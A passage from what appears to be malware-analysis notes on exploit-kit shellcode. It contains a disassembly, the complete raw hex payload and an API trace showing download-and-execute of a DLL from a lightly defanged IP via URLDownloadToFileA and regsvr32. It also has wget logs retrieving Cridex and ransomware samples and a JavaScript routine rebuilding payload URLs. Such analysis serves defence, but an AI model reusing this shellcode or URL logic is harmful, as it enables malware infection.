  343. 000000DD  382DEBCBD747      cmp [dword 0x47d7cbeb],ch
  344. 000000E3  40                inc eax
  345. 000000E4  284640            sub [esi+0x40],al ; math
  346. 000000E7  285A5D            sub [edx+0x5d],bl ; math
  347. 000000EA  45                inc ebp
  348. 000000EB  44                inc esp
  349. 000000EC  D7                xlatb
  350. 000000ED  7CAB              jl 0x9a
  351. 000000EF  3E20EC            ds and ah,ch
  352. 000000F2  C0A349C0D7D7C3    shl byte [ebx-0x28283fb7],0xc3
  353. 000000F9  D7                xlatb
  354. 000000FA  C3                ret
  355. 000000FB  2AA95A2CC428      sub ch,[ecx+0x28c42c5a] ; math
  356. 00000101  29A5280C74EF      sub [ebp-0x108bf3d8],esp ; math
  357. 00000107  240C              and al,0xc
  358. 00000109  2C4D              sub al,0x4d ; math
  359. 0000010B  5A                pop edx
  360. 0000010C  5B                pop ebx
  361. 0000010D  4F                dec edi
  362. 0000010E  6C                insb
  363. 0000010F  EF                out dx,eax
  364. 00000110  2C0C              sub al,0xc ; math
  365. 00000112  5A                pop edx
  366. 00000113  5E                pop esi
  367. 00000114  1A1B              sbb bl,[ebx]
  368. 00000116  6C                insb
  369. 00000117  EF                out dx,eax
  370. 00000118  200C0508085B40    and [eax+0x405b0808],cl
  371. 0000011F  7B28              jpo 0x149
  372. 00000121  D028              shr byte [eax],1
  373. 00000123  287ED7            sub [esi-0x29],bh ; math
  374. 00000126  A3241BC079        mov [0x79c01b24],eax
  375. 0000012B  E16C              loope 0x199
  376. 0000012D  EF                out dx,eax
  377. 0000012E  2835585F5C4A      sub [dword 0x4a5c5f58],dh ; math
  378. 00000134  6C                insb
  379. 00000135  EF                out dx,eax
  380. 00000136  2D354C0644        sub eax,0x44064c35 ; math
  381. 0000013B  44                inc esp
  382. 0000013C  6C                insb
  383. 0000013D  EE                out dx,al
  384. 0000013E  21357128E9A2      and [dword 0xa2e92871],esi
  385. 00000144  182C6C            sbb [esp+ebp*2],ch
  386. 00000147  A02C357969        mov al,[0x6979352c]
  387. 0000014C  284228            sub [edx+0x28],al ; math
  388. 0000014F  42                inc edx
  389. 00000150  7F7B              jg 0x1cd
  390. 00000152  28427E            sub [edx+0x7e],al ; math
  391. 00000155  D7                xlatb
  392. 00000156  AD                lodsd
  393. 00000157  3C5D              cmp al,0x5d
  394. 00000159  E8423E7B28        call dword 0x287b3fa0 ; call
  395. 0000015E  7ED7              jng 0x137
  396. 00000160  42                inc edx
  397. 00000161  2CAB              sub al,0xab ; math
  398. 00000163  2824C3            sub [ebx+eax*8],ah ; math
  399. 00000166  D7                xlatb
  400. 00000167  7B2C              jpo 0x195
  401. 00000169  7EEB              jng 0x156
  402. 0000016B  AB                stosd
  403. 0000016C  C3                ret
  404. 0000016D  24C3              and al,0xc3
  405. 0000016F  2A6F3B            sub ch,[edi+0x3b] ; math
  406. 00000172  17                pop ss
  407. 00000173  A85D              test al,0x5d
  408. 00000175  286FD2            sub [edi-0x2e],ch ; math
  409. 00000178  17                pop ss
  410. 00000179  A85D              test al,0x5d
  411. 0000017B  2842EC            sub [edx-0x14],al ; math
  412. 0000017E  42                inc edx
  413. 0000017F  28D7              sub bh,dl ; math
  414. 00000181  D6                salc
  415. 00000182  207EB4            and [esi-0x4c],bh
  416. 00000185  C0D7D6            rcl bh,0xd6
  417. 00000188  A6                cmpsb
  418. 00000189  D7                xlatb
  419. 0000018A  2666B0C4          es o16 mov al,0xc4
  420. 0000018E  A2D6A12629        mov [0x2926a1d6],al
  421. 00000193  47                inc edi
  422. 00000194  1B95A2E23373      sbb edx,[ebp+0x7333e2a2]
  423. 0000019A  6E                outsb
  424. 0000019B  EE                out dx,al
  425. 0000019C  1E                push ds
  426. 0000019D  51                push ecx
  427. 0000019E  07                pop es
  428. 0000019F  324058            xor al,[eax+0x58] ; decryption
  429. 000001A2  5C                pop esp
  430. 000001A3  5C                pop esp
  431. 000001A4  125807            adc bl,[eax+0x7]
  432. 000001A7  07                pop es
  433. 000001A8  1E                push ds
  434. 000001A9  1C19              sbb al,0x19
  435. 000001AB  06                push es
  436. 000001AC  1D1F1A061C        sbb eax,0x1c061a1f
  437. 000001B1  1A1A              sbb bl,[edx]
  438. 000001B3  06                push es
  439. 000001B4  1219              adc bl,[ecx]
  440. 000001B6  1810              sbb [eax],dl
  441. 000001B8  1810              sbb [eax],dl
  442. 000001BA  4E                dec esi
  443. 000001BB  07                pop es
  444. 000001BC  5A                pop edx
  445. 000001BD  47                inc edi
  446. 000001BE  45                inc ebp
  447. 000001BF  5D                pop ebp
  448. 000001C0  44                inc esp
  449. 000001C1  07                pop es
  450. 000001C2  46                inc esi
  451. 000001C3  41                inc ecx
  452. 000001C4  5B                pop ebx
  453. 000001C5  43                inc ebx
  454. 000001C6  58                pop eax
  455. 000001C7  07                pop es
  456. 000001C8  4A                dec edx
  457. 000001C9  5D                pop ebp
  458. 000001CA  41                inc ecx
  459. 000001CB  44                inc esp
  460. 000001CC  774B              ja 0x219
  461. 000001CE  4D                dec ebp
  462. 000001CF  5E                pop esi
  463. 000001D0  5B                pop ebx
  464. 000001D1  5A                pop edx
  465. 000001D2  47                inc edi
  466. 000001D3  41                inc ecx
  467. 000001D4  06                push es
  468. 000001D5  46                inc esi
  469. 000001D6  40                inc eax
  470. 000001D7  58                pop eax
  471. 000001D8  17                pop ss
  472. 000001D9  58                pop eax
  473. 000001DA  4E                dec esi
  474. 000001DB  5C                pop esp
  475. 000001DC  1B1512184619      sbb edx,[dword 0x19461812]
  476. 000001E2  1912              sbb [edx],edx
  477. 000001E4  124141            adc al,[ecx+0x41]
  478. 000001E7  191B              sbb [ebx],ebx
  479. 000001E9  120E              adc cl,[esi]
  480. 000001EB  1B4D5F            sbb ecx,[ebp+0x5f]
  481. 000001EE  1A15125E4319      sbb dl,[dword 0x19435e12]
  482. 000001F4  1912              sbb [edx],edx
  483. 000001F6  12451A            adc al,[ebp+0x1a]
  484. 000001F9  1B1B              sbb ebx,[ebx]
  485. 000001FB  1212              adc dl,[edx]
  486. 000001FD  1B4319            sbb eax,[ebx+0x19]
  487. 00000200  1912              sbb [edx],edx
  488. 00000202  124319            adc al,[ebx+0x19]
  489. 00000205  1B19              sbb ebx,[ecx]
  490. 00000207  1212              adc dl,[edx]
  491. 00000209  42                inc edx
  492. 0000020A  47                inc edi
  493. 0000020B  19590E            sbb [ecx+0xe],ebx
  494. 0000020E  19150E434045      sbb [dword 0x4540430e],edx
  495. 00000214  58                pop eax
  496. 00000215  155E0E155E        adc eax,0x5e150e5e
  497. 0000021A  285A00            sub [edx+0x0],bl ; math
  498. 0000021D  28                db 0x28
  499.  
  500. // gathered blocks of API..
  501. blocks..   translation..
  502. 0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
  503. 0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
  504. 0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])    
  505. 0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://46.175.224.21:8080/forum/links/public_version.php?tf=30:1n:1i:1i:33&we=2v:1k:1m:32:33:1k:1k:31:1j:1o&q=1k&mh=p&vv=r, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
  506. 0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
  507. 0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
  508. 0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
  509.  
  510.  
  511. // same one.... different code.. in url parts.. two time...
  512.  
  513. // raws..
  514. 414141418366fce4ebfc5810c931816603e980fe2830e240ebfae805ffebffffccad1c5d77c1e81ba34c186868a3a3243458a37e205ef31ba34e14765c2b041bc6a9383dd7d7a39018686eeb2e11d35d1cafad0c5dccc17964c37e795da3a3141d5c2b507edd5ea32b081bdd61e1d4692b851bed27f33896da10205ce3e92b2568f2d9c33713ce5da3760c76f52ba34e63246ea5d7c40c7ca3242bf0a3f5a32ced2b7683eb717bc3a385084055a81b242b5cc3bea3db2040dfa32d42c071d7b0d7d7d1ca28c0282870284278406828d72828ab7831e87d78c4a376a3ab382debcbd74740284640285a5d4544d77cab3e20ecc0a349c0d7d7c3d7c32aa95a2cc42829a5280c74ef240c2c4d5a5b4f6cef2c0c5a5e1a1b6cef200c0508085b407b28d028287ed7a3241bc079e16cef2835585f5c4a6cef2d354c0644446cee21357128e9a2182c6ca02c357969284228427f7b28427ed7ad3c5de8423e7b287ed7422cab2824c3d77b2c7eebabc324c32a6f3b17a85d286fd217a85d2842ec4228d7d6207eb4c0d7d6a6d72666b0c4a2d6a12629471b95a2e233736eee1e51073240585c5c125807071e1c19061d1f1a061c1a1a061219181018104e075a47455d440746415b4358074a5d4144774b4d5e5b5a47410646405817584e5c1b15121846191912124141191b120e1b4d5f1a15125e4319191212451a1b1b12121b431919121243191b191212424719590e19150e43404558155e0e155e285a0028
  515.  
  516. // view...
  517. 41 41 41 41 66 83 e4 fc  fc eb 10 58 31 c9 66 81  AAAAf......X1.f.
  518. e9 03 fe 80 30 28 40 e2  fa eb 05 e8 eb ff ff ff  ....0(@.........
  519. ad cc 5d 1c c1 77 1b e8  4c a3 68 18 a3 68 24 a3  ..]..w..L.h..h$.
  520. 58 34 7e a3 5e 20 1b f3  4e a3 76 14 2b 5c 1b 04  X4~.^...N.v.+\..
  521. a9 c6 3d 38 d7 d7 90 a3  68 18 eb 6e 11 2e 5d d3  ..=8....h..n..].
  522. af 1c 0c ad cc 5d 79 c1  c3 64 79 7e a3 5d 14 a3  .....]y..dy~.]..
  523. 5c 1d 50 2b dd 7e a3 5e  08 2b dd 1b e1 61 69 d4  \.P+.~.^.+...ai.
  524. 85 2b ed 1b f3 27 96 38  10 da 5c 20 e9 e3 25 2b  .+...'.8..\...%+
  525. f2 68 c3 d9 13 37 5d ce  76 a3 76 0c 2b f5 4e a3  .h...7].v.v.+.N.
  526. 24 63 a5 6e c4 d7 7c 0c  24 a3 f0 2b f5 a3 2c a3  $c.n..|.$..+..,.
  527. 2b ed 83 76 71 eb c3 7b  85 a3 40 08 a8 55 24 1b  +..vq..{..@..U$.
  528. 5c 2b be c3 db a3 40 20  a3 df 42 2d 71 c0 b0 d7  \+....@...B-q...
  529. d7 d7 ca d1 c0 28 28 28  28 70 78 42 68 40 d7 28  .....((((pxBh@.(
  530. 28 28 78 ab e8 31 78 7d  a3 c4 a3 76 38 ab eb 2d  ((x..1x}...v8..-
  531. d7 cb 40 47 46 28 28 40  5d 5a 44 45 7c d7 3e ab  ..@GF((@]ZDE|.>.
  532. ec 20 a3 c0 c0 49 d7 d7  d7 c3 2a c3 5a a9 c4 2c  .....I....*.Z..,
  533. 29 28 28 a5 74 0c 24 ef  2c 0c 5a 4d 4f 5b ef 6c  )((.t.$.,.ZMO[.l
  534. 0c 2c 5e 5a 1b 1a ef 6c  0c 20 08 05 5b 08 7b 40  .,^Z...l....[.{@
  535. d0 28 28 28 d7 7e 24 a3  c0 1b e1 79 ef 6c 35 28  .(((.~$....y.l5(
  536. 5f 58 4a 5c ef 6c 35 2d  06 4c 44 44 ee 6c 35 21  _XJ\.l5-.LDD.l5!
  537. 28 71 a2 e9 2c 18 a0 6c  35 2c 69 79 42 28 42 28  (q..,..l5,iyB(B(
  538. 7b 7f 42 28 d7 7e 3c ad  e8 5d 3e 42 28 7b d7 7e  {.B(.~<..]>B({.~
  539. 2c 42 28 ab c3 24 7b d7  7e 2c ab eb 24 c3 2a c3  ,B(..${.~,..$.*.
  540. 3b 6f a8 17 28 5d d2 6f  a8 17 28 5d ec 42 28 42  ;o..(].o..(].B(B
  541. d6 d7 7e 20 c0 b4 d6 d7  d7 a6 66 26 c4 b0 d6 a2  ..~.......f&....
  542. 26 a1 47 29 95 1b e2 a2  73 33 ee 6e 51 1e 32 07  &.G)....s3.nQ.2.
  543. 58 40 5c 5c 58 12 07 07  1c 1e 06 19 1f 1d 06 1a  X@\\X...........
  544. 1a 1c 06 1a 19 12 10 18  10 18 07 4e 47 5a 5d 45  ...........NGZ]E
  545. 07 44 41 46 43 5b 07 58  5d 4a 44 41 4b 77 5e 4d  .DAFC[.X]JDAKw^M
  546. 5a 5b 41 47 46 06 58 40  58 17 46 4e 15 19 40 12  Z[AGF.X@X.FN..@.
  547. 19 42 12 19 42 12 1b 1a  12 19 4e 0e 42 4d 15 19  .B..B.....N.BM..
  548. 42 12 1b 1b 12 1b 1a 12  19 44 12 19 4f 12 19 41  B........D..O..A
  549. 12 19 47 12 19 46 12 19  47 12 19 41 0e 5c 15 19  ..G..F..G..A.\..
  550. 43 0e 47 51 15 58 0e 42  40 15 41 28 28 00        C.GQ.X.B@.A((.  
  551.  
  552. //disasm...
  553. 00000000  41                inc ecx
  554. 00000001  41                inc ecx
  555. 00000002  41                inc ecx
  556. 00000003  41                inc ecx
  557. 00000004  8366FCE4          and dword [esi-0x4],byte -0x1c
  558. 00000008  EBFC              jmp short 0x6 ; loop
  559. 0000000A  58                pop eax
  560. 0000000B  10C9              adc cl,cl
  561. 0000000D  31816603E980      xor [ecx-0x7f16fc9a],eax ; decryption
  562. 00000013  FE                db 0xfe
  563. 00000014  2830              sub [eax],dh ; math
  564. 00000016  E240              loop 0x58 ; loop
  565. 00000018  EBFA              jmp short 0x14 ; loop
  566. 0000001A  E805FFEBFF        call dword 0xffebff24 ; call
  567. 0000001F  FFCC              dec esp
  568. 00000021  AD                lodsd
  569. 00000022  1C5D              sbb al,0x5d
  570. 00000024  77C1              ja 0xffffffe7
  571. 00000026  E81BA34C18        call dword 0x184ca346 ; call
  572. 0000002B  6868A3A324        push dword 0x24a3a368
  573. 00000030  3458              xor al,0x58 ; decryption
  574. 00000032  A37E205EF3        mov [0xf35e207e],eax
  575. 00000037  1BA34E14765C      sbb esp,[ebx+0x5c76144e]
  576. 0000003D  2B041B            sub eax,[ebx+ebx] ; math
  577. 00000040  C6                db 0xc6
  578. 00000041  A9383DD7D7        test eax,0xd7d73d38
  579. 00000046  A39018686E        mov [0x6e681890],eax
  580. 0000004B  EB2E              jmp short 0x7b ; loop
  581. 0000004D  11D3              adc ebx,edx
  582. 0000004F  5D                pop ebp
  583. 00000050  1CAF              sbb al,0xaf
  584. 00000052  AD                lodsd
  585. 00000053  0C5D              or al,0x5d
  586. 00000055  CC                int3
  587. 00000056  C17964C3          sar dword [ecx+0x64],0xc3
  588. 0000005A  7E79              jng 0xd5
  589. 0000005C  5D                pop ebp
  590. 0000005D  A3A3141D5C        mov [0x5c1d14a3],eax
  591. 00000062  2B507E            sub edx,[eax+0x7e] ; math
  592. 00000065  DD5EA3            fstp qword [esi-0x5d]
  593. 00000068  2B08              sub ecx,[eax] ; math
  594. 0000006A  1BDD              sbb ebx,ebp
  595. 0000006C  61                popad
  596. 0000006D  E1D4              loope 0x43
  597. 0000006F  692B851BED27      imul ebp,[ebx],dword 0x27ed1b85
  598. 00000075  F33896DA10205C    rep cmp [esi+0x5c2010da],dl
  599. 0000007C  E3E9              jecxz 0x67
  600. 0000007E  2B2568F2D9C3      sub esp,[dword 0xc3d9f268] ; math
  601. 00000084  37                aaa
  602. 00000085  13CE              adc ecx,esi
  603. 00000087  5D                pop ebp
  604. 00000088  A3760C76F5        mov [0xf5760c76],eax
  605. 0000008D  2BA34E63246E      sub esp,[ebx+0x6e24634e] ; math
  606. 00000093  A5                movsd
  607. 00000094  D7                xlatb
  608. 00000095  C40C7C            les ecx,[esp+edi*2]
  609. 00000098  A3242BF0A3        mov [0xa3f02b24],eax
  610. 0000009D  F5                cmc
  611. 0000009E  A32CED2B76        mov [0x762bed2c],eax
  612. 000000A3  83EB71            sub ebx,byte +0x71 ; math
  613. 000000A6  7BC3              jpo 0x6b
  614. 000000A8  A385084055        mov [0x55400885],eax
  615. 000000AD  A81B              test al,0x1b
  616. 000000AF  242B              and al,0x2b
  617. 000000B1  5C                pop esp
  618. 000000B2  C3                ret
  619. 000000B3  BEA3DB2040        mov esi,0x4020dba3
  620. 000000B8  DFA32D42C071      fbld tword [ebx+0x71c0422d]
  621. 000000BE  D7                xlatb
  622. 000000BF  B0D7              mov al,0xd7
  623. 000000C1  D7                xlatb
  624. 000000C2  D1CA              ror edx,1 ; bitwise cipher
  625. 000000C4  28C0              sub al,al ; math
  626. 000000C6  2828              sub [eax],ch ; math
  627. 000000C8  7028              jo 0xf2
  628. 000000CA  42                inc edx
  629. 000000CB  7840              js 0x10d
  630. 000000CD  6828D72828        push dword 0x2828d728
  631. 000000D2  AB                stosd
  632. 000000D3  7831              js 0x106
  633. 000000D5  E87D78C4A3        call dword 0xa3c47957 ; call
  634. 000000DA  76A3              jna 0x7f
  635. 000000DC  AB                stosd
  636. 000000DD  382DEBCBD747      cmp [dword 0x47d7cbeb],ch
  637. 000000E3  40                inc eax
  638. 000000E4  284640            sub [esi+0x40],al ; math
  639. 000000E7  285A5D            sub [edx+0x5d],bl ; math
  640. 000000EA  45                inc ebp
  641. 000000EB  44                inc esp
  642. 000000EC  D7                xlatb
  643. 000000ED  7CAB              jl 0x9a
  644. 000000EF  3E20EC            ds and ah,ch
  645. 000000F2  C0A349C0D7D7C3    shl byte [ebx-0x28283fb7],0xc3
  646. 000000F9  D7                xlatb
  647. 000000FA  C3                ret
  648. 000000FB  2AA95A2CC428      sub ch,[ecx+0x28c42c5a] ; math
  649. 00000101  29A5280C74EF      sub [ebp-0x108bf3d8],esp ; math
  650. 00000107  240C              and al,0xc
  651. 00000109  2C4D              sub al,0x4d ; math
  652. 0000010B  5A                pop edx
  653. 0000010C  5B                pop ebx
  654. 0000010D  4F                dec edi
  655. 0000010E  6C                insb
  656. 0000010F  EF                out dx,eax
  657. 00000110  2C0C              sub al,0xc ; math
  658. 00000112  5A                pop edx
  659. 00000113  5E                pop esi
  660. 00000114  1A1B              sbb bl,[ebx]
  661. 00000116  6C                insb
  662. 00000117  EF                out dx,eax
  663. 00000118  200C0508085B40    and [eax+0x405b0808],cl
  664. 0000011F  7B28              jpo 0x149
  665. 00000121  D028              shr byte [eax],1
  666. 00000123  287ED7            sub [esi-0x29],bh ; math
  667. 00000126  A3241BC079        mov [0x79c01b24],eax
  668. 0000012B  E16C              loope 0x199
  669. 0000012D  EF                out dx,eax
  670. 0000012E  2835585F5C4A      sub [dword 0x4a5c5f58],dh ; math
  671. 00000134  6C                insb
  672. 00000135  EF                out dx,eax
  673. 00000136  2D354C0644        sub eax,0x44064c35 ; math
  674. 0000013B  44                inc esp
  675. 0000013C  6C                insb
  676. 0000013D  EE                out dx,al
  677. 0000013E  21357128E9A2      and [dword 0xa2e92871],esi
  678. 00000144  182C6C            sbb [esp+ebp*2],ch
  679. 00000147  A02C357969        mov al,[0x6979352c]
  680. 0000014C  284228            sub [edx+0x28],al ; math
  681. 0000014F  42                inc edx
  682. 00000150  7F7B              jg 0x1cd
  683. 00000152  28427E            sub [edx+0x7e],al ; math
  684. 00000155  D7                xlatb
  685. 00000156  AD                lodsd
  686. 00000157  3C5D              cmp al,0x5d
  687. 00000159  E8423E7B28        call dword 0x287b3fa0 ; call
  688. 0000015E  7ED7              jng 0x137
  689. 00000160  42                inc edx
  690. 00000161  2CAB              sub al,0xab ; math
  691. 00000163  2824C3            sub [ebx+eax*8],ah ; math
  692. 00000166  D7                xlatb
  693. 00000167  7B2C              jpo 0x195
  694. 00000169  7EEB              jng 0x156
  695. 0000016B  AB                stosd
  696. 0000016C  C3                ret
  697. 0000016D  24C3              and al,0xc3
  698. 0000016F  2A6F3B            sub ch,[edi+0x3b] ; math
  699. 00000172  17                pop ss
  700. 00000173  A85D              test al,0x5d
  701. 00000175  286FD2            sub [edi-0x2e],ch ; math
  702. 00000178  17                pop ss
  703. 00000179  A85D              test al,0x5d
  704. 0000017B  2842EC            sub [edx-0x14],al ; math
  705. 0000017E  42                inc edx
  706. 0000017F  28D7              sub bh,dl ; math
  707. 00000181  D6                salc
  708. 00000182  207EB4            and [esi-0x4c],bh
  709. 00000185  C0D7D6            rcl bh,0xd6
  710. 00000188  A6                cmpsb
  711. 00000189  D7                xlatb
  712. 0000018A  2666B0C4          es o16 mov al,0xc4
  713. 0000018E  A2D6A12629        mov [0x2926a1d6],al
  714. 00000193  47                inc edi
  715. 00000194  1B95A2E23373      sbb edx,[ebp+0x7333e2a2]
  716. 0000019A  6E                outsb
  717. 0000019B  EE                out dx,al
  718. 0000019C  1E                push ds
  719. 0000019D  51                push ecx
  720. 0000019E  07                pop es
  721. 0000019F  324058            xor al,[eax+0x58] ; decryption
  722. 000001A2  5C                pop esp
  723. 000001A3  5C                pop esp
  724. 000001A4  125807            adc bl,[eax+0x7]
  725. 000001A7  07                pop es
  726. 000001A8  1E                push ds
  727. 000001A9  1C19              sbb al,0x19
  728. 000001AB  06                push es
  729. 000001AC  1D1F1A061C        sbb eax,0x1c061a1f
  730. 000001B1  1A1A              sbb bl,[edx]
  731. 000001B3  06                push es
  732. 000001B4  1219              adc bl,[ecx]
  733. 000001B6  1810              sbb [eax],dl
  734. 000001B8  1810              sbb [eax],dl
  735. 000001BA  4E                dec esi
  736. 000001BB  07                pop es
  737. 000001BC  5A                pop edx
  738. 000001BD  47                inc edi
  739. 000001BE  45                inc ebp
  740. 000001BF  5D                pop ebp
  741. 000001C0  44                inc esp
  742. 000001C1  07                pop es
  743. 000001C2  46                inc esi
  744. 000001C3  41                inc ecx
  745. 000001C4  5B                pop ebx
  746. 000001C5  43                inc ebx
  747. 000001C6  58                pop eax
  748. 000001C7  07                pop es
  749. 000001C8  4A                dec edx
  750. 000001C9  5D                pop ebp
  751. 000001CA  41                inc ecx
  752. 000001CB  44                inc esp
  753. 000001CC  774B              ja 0x219
  754. 000001CE  4D                dec ebp
  755. 000001CF  5E                pop esi
  756. 000001D0  5B                pop ebx
  757. 000001D1  5A                pop edx
  758. 000001D2  47                inc edi
  759. 000001D3  41                inc ecx
  760. 000001D4  06                push es
  761. 000001D5  46                inc esi
  762. 000001D6  40                inc eax
  763. 000001D7  58                pop eax
  764. 000001D8  17                pop ss
  765. 000001D9  58                pop eax
  766. 000001DA  4E                dec esi
  767. 000001DB  5C                pop esp
  768. 000001DC  1B1512184619      sbb edx,[dword 0x19461812]
  769. 000001E2  1912              sbb [edx],edx
  770. 000001E4  124141            adc al,[ecx+0x41]
  771. 000001E7  191B              sbb [ebx],ebx
  772. 000001E9  120E              adc cl,[esi]
  773. 000001EB  1B4D5F            sbb ecx,[ebp+0x5f]
  774. 000001EE  1A15125E4319      sbb dl,[dword 0x19435e12]
  775. 000001F4  1912              sbb [edx],edx
  776. 000001F6  12451A            adc al,[ebp+0x1a]
  777. 000001F9  1B1B              sbb ebx,[ebx]
  778. 000001FB  1212              adc dl,[edx]
  779. 000001FD  1B4319            sbb eax,[ebx+0x19]
  780. 00000200  1912              sbb [edx],edx
  781. 00000202  124319            adc al,[ebx+0x19]
  782. 00000205  1B19              sbb ebx,[ecx]
  783. 00000207  1212              adc dl,[edx]
  784. 00000209  42                inc edx
  785. 0000020A  47                inc edi
  786. 0000020B  19590E            sbb [ecx+0xe],ebx
  787. 0000020E  19150E434045      sbb [dword 0x4540430e],edx
  788. 00000214  58                pop eax
  789. 00000215  155E0E155E        adc eax,0x5e150e5e
  790. 0000021A  285A00            sub [edx+0x0],bl ; math
  791. 0000021D  28                db 0x28
  792.  
  793. //translating API..
  794.  
  795. blocks.... translation...
  796. 0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
  797. 0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
  798. 0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])    
  799. 0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://46.175.224.21:8080/forum/links/public_version.php?nf=1h:1j:1j:32:1f&je=1j:33:32:1l:1g:1i:1o:1n:1o:1i&t=1k&oy=p&jh=i, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
  800. 0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
  801. 0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
  802. 0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
  803.  
  804. //============================
  805. // PAYLOADS GOES FIRST...
  806. //============================
  807.  
  808. // fetch these sh*ts...
  809.  
  810. --2013-02-18 15:08:46--  h00p://46.175.224.21:8080/forum/links/public_version.php?tf=30:1n:1i:1i:33&we=2v:1k:1m:32:33:1k:1k:31:1j:1o&q=1k&mh=p&vv=r
  811. seconds 0.00, Connecting to 46.175.224.21:8080... seconds 0.00, connected.
  812.   :
  813. GET /forum/links/public_version.php?tf=30:1n:1i:1i:33&we=2v:1k:1m:32:33:1k:1k:31:1j:1o&q=1k&mh=p&vv=r http/1.0
  814. Host: 46.175.224.21:8080
  815. http request sent, awaiting response...
  816.   :
  817. http/1.1 200 OK
  818. Server: nginx/1.0.10
  819. Date: Mon, 18 Feb 2013 06:08:39 GMT
  820. Content-Type: application/x-msdownload
  821. Connection: keep-alive
  822. X-Powered-By: PHP/5.3.18-1~dotdeb.0
  823. Pragma: public
  824. Expires: Mon, 18 Feb 2013 06:08:39 GMT
  825. Cache-Control: must-revalidate, post-check=0, pre-check=0
  826. Cache-Control: private
  827. Content-Disposition: attachment; filename="about.exe"
  828. Content-Transfer-Encoding: binary
  829. Content-Length: 94208
  830.   :
  831. 200 OK
  832. Length: 94208 (92K) [application/x-msdownload]
  833. Saving to: `./about.exe'
  834. 2013-02-18 15:08:48 (59.5 KB/s) - `./about.exe' saved [94208/94208]
  835.  
  836.  
  837. --2013-02-18 15:07:55--  h00p://46.175.224.21:8080/forum/links/public_version.php?nf=1h:1j:1j:32:1f&je=1j:33:32:1l:1g:1i:1o:1n:1o:1i&t=1k&oy=p&jh=i
  838. seconds 0.00, Connecting to 46.175.224.21:8080... seconds 0.00, connected.
  839.   :
  840. GET /forum/links/public_version.php?nf=1h:1j:1j:32:1f&je=1j:33:32:1l:1g:1i:1o:1n:1o:1i&t=1k&oy=p&jh=i http/1.0
  841. Host: 46.175.224.21:8080
  842. http request sent, awaiting response...
  843.   :
  844. h00p/1.1 200 OK
  845. Server: nginx/1.0.10
  846. Date: Mon, 18 Feb 2013 06:07:48 GMT
  847. Content-Type: application/x-msdownload
  848. Connection: keep-alive
  849. X-Powered-By: PHP/5.3.18-1~dotdeb.0
  850. Pragma: public
  851. Expires: Mon, 18 Feb 2013 06:07:48 GMT
  852. Cache-Control: must-revalidate, post-check=0, pre-check=0
  853. Cache-Control: private
  854. Content-Disposition: attachment; filename="readme.exe"
  855. Content-Transfer-Encoding: binary
  856. Content-Length: 279040
  857.   :
  858. 200 OK
  859. Length: 279040 (273K) [application/x-msdownload]
  860. Saving to: `./readme.exe'
  861. 2013-02-18 15:08:00 (70.7 KB/s) - `./readme.exe' saved [279040/279040]
  862.  
  863.  
  864. //Payloads checks...Cridex & ransomware....
  865.  
  866. https://www.virustotal.com/ja/file/bea956049c02eefa07495dda55a1624ba3fe4020ed268094f7b63ec53439d48d/analysis/1361171081/
  867. https://www.virustotal.com/ja/file/5050a5bdf164767ba6a8432a273942983737b3553c2f0d8fdbab42bbdaab3f6e/analysis/1361171101/
  868.  
  869.  
  870.  
  871. =============CRACK LOGIC FOR PDF URL==================
  872.  
  873. function x(s){
  874.   d = [];
  875.   for (i = 0; i < s.length; i ++ ){
  876.     k = (s.charCodeAt(i)).toString(33);
  877.     d.push(k);
  878.   }
  879.   ;
  880.   return d.join(":");
  881. }
  882.  
  883. var domain="h00p://46.175.224.21:8080";
  884. var pdf ="1k:1d:1f:1d:1g:1d:1f";
  885.  
  886. var string1 ="/forum/links/public_version.php?tzpiqxci=" + x("244e0") + "&rqoddrzb=" + x("bpc") + "&gejepm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&ifsrn=";
  887. var string2 ="/forum/links/public_version.php?iitxovwc=" + x("244e0") + "&hic=" + x("c") + "&ztm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&dremyj=" ;
  888. var string3 ="/forum/links/public_version.php?hysb=" + x("c833f") + "&togkor=" + x("oyt") + "&wafox=2v:1k:1m:32:33:1k:1k:31:1j:1o&wdnxc=";
  889. var string4 ="/forum/links/public_version.php?myedivup=" + x("c833f") + "&gtaaynbu=" + x("h") + "&kxqcms=2v:1k:1m:32:33:1k:1k:31:1j:1o&oiqkk=";
  890.  
  891. var url1 = domain + string1 + pdf;
  892. var url2 = domain + string2 + pdf;
  893. var url3 = domain + string3 + pdf;
  894. var url4 = domain + string4 + pdf;
  895.  
  896. document.write(url1 + "\n" + url2+ "\n" + url3 + "\n" + url4);
  897.  
  898.  
  899. // output:
  900.  
  901. h00p://46.175.224.21:8080/forum/links/public_version.php?tzpiqxci=1h:1j:1j:32:1f&rqoddrzb=2w:3d:30&gejepm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&ifsrn=1k:1d:1f:1d:1g:1d:1f
  902. h00p://46.175.224.21:8080/forum/links/public_version.php?iitxovwc=1h:1j:1j:32:1f&hic=30&ztm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&dremyj=1k:1d:1f:1d:1g:1d:1f
